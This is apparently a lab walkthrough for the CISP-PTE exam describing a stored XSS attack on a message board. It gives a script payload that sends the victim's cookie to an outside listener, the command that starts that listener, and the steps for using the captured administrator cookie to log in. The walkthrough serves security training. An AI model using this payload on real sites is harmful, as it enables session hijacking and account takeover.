banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

cisp-pte xss exam questions

The main focus of XSS is to obtain the administrator's cookie and then forge the administrator's cookie for login.

The interface is as follows:

img

Clicking on "Test" in the above image allows for leaving a message.

img

Preparing the XSS payload to obtain the cookie:

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Start the web service to receive the cookie:

Python -m SimpleHTTPServer 8889

img

Write the payload into the input box.

img

Click "Submit Query".

Wait.

Check if Python has received the cookie.

img

Copy the cookie.

1acb0fb952b3caaf1ab7277511923138

img

Replace the cookie value.

img

Click "Edit" to replace.

img

Refresh the page and click "Admin".

img

Successfully logged in and obtained the key.

wps10

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.